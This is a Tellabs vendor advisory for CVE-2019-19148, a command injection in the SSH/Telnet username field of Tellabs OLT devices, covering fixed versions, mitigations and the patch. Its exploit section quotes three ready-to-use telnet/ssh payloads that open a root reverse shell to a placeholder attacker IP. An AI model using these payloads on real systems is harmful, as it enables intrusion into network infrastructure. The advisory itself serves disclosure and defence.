Loader

CVE-2019-19148

Vulnerability Statement for CVE-2019-19148

ENG-010638

Introduction

This document defines the Vulnerability CVE-2019-19148 noted against the Tellabs OLT and the resolution to this vulnerability.

Applies To

  • Courier NewThis Vulnerability applies to the following list of versions of the Tellabs 1150, 1134, and 1131 OLT software:
  • This Vulnerability is resolved in the following software versions of the Tellabs 1150, 1134, and 1131 OLT software: SR30.1 and SR31.1

CVE Short Description

An OS command injection vulnerability has been discovered in the SSH interface of the Tellabs Optical LAN Network Element in system release versions prior to 30.1_561090 and 31.1_601053. The vulnerability allows an attacker to execute arbitrary code at a privileged level due to allowing of certain special characters in the userid.

Tellabs has addressed this issue in the SR30.1 and SR31.1 release on February 18, 2020. These versions are available on the Tellabs Portal.

CVE-2019-19148 Description

During a recent penetration test, a vulnerability in the way Tellabs handles incoming authentication/authorization was discovered which allowed us to bypass the authentication methods on the Tellabs OLT 1150 device. It is highly suspected that this vulnerability exists in other devices as well.

[Product]

Vendor: Tellabs

Model: MX-IPTV1150

System Version: FP29.2_015873

Release: ONT709.2.50.12

Date: 180722

Steps used to exploit

Steps to reproduce were based on the older Telnet "ShellShock" vulnerability. It's known that the following methods all produced a netcat reverse shell as root:

telnet [OLTHOSTNAME] -l ";EOF() { :;}; /usr/bin/id & /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

The above command asked for the username within the telnet session, and when it timed out, produced the output: "uid=0(emsuser) gid=0(root)" showing that the second portion of the command was not parsed, and the system was vulnerable.

telnet [OLTHOSTNAME] -l "() { :;}; $((/bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1)) /bin/bash -i >&/dev/tcp/[attacker_ip]/4455 0>&1"

The above command was run and produced a reverse 'netcat' style shell to the attacker IP address with a full root bash shell. Again, suspect the second portion of the command was unnecessary, but due to time constraints, was unable to test further.

ssh [OLTHOSTNAME] -l "''; /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

After 3 failed authentication attempts the connect back to the netcat listener occurs and you are dropped in a root shell. (Contributed by Sandia National Laboratory)

Due to customer concerns with the critical nature of the networking infrastructure, further testing beyond the above was not possible, and the customer immediately contacted the vendor to work on a patch.

Tellabs Recommended Mitigations

Tellabs recommends upgrades to a release that contains the resolution for this problem as the primary resolution at the earliest opportunity. Due to critical nature of many systems, there may be some interim period where the older releases are running. The following mitigations can limit the exposure to thisvulnerability.

Tellabs equipment by default has telnet disabled and it must be manually enabled by an EMS admin user to be able to connect via Telnet. Telnet should remain disabled in all production systems at all time. It should be noted that Telnet has been completely removed in the software releases that are noted in the resolutions. You can verify Telnet is disabled by clicking:

Click the OLT-> Right Click Properties->Security Tab

The telnet option should be unchecked as in the following example:

Tellabs equipment supports a trusted host feature that prevents connections from any IP address other than those that are specified in the trusted host list.

The Trusted Host Menu can be reached by going to the common tree:

Click the OLT-> Right Click->Properties->Security Tab

You should, at a minimum, add the EMS IP, the Default Gateway IP and any individual machines you want to allow access from. This will prevent any other addresses from reaching.

the OLT and is a good practice for all installations. All packets from IP addresses not in the Trusted Host list will be dropped.

 

CVE Solution

Tellabs has addressed this issue in SR30.1 and SR31.1 versions release on February 18, 2020. These versions are available on the Tellabs Portal.

  • The Tellabs OLT software has been updated to prevent any special characters within the user field of the ssh authentication.
  • All special characters will be stripped and not passed on down the authentication stack.
  • Attempts at command injection will now result in authentication failure.

For further support, please contact the Tellabs 24/7 Technical Assistance Center (TAC) .

FEEDBACK: Are you happy with this material?
  •   © 2025 Tellabs Access, LLC. All rights reserved - A Better Way to Build and Operate Networks.

On this page

light-box Image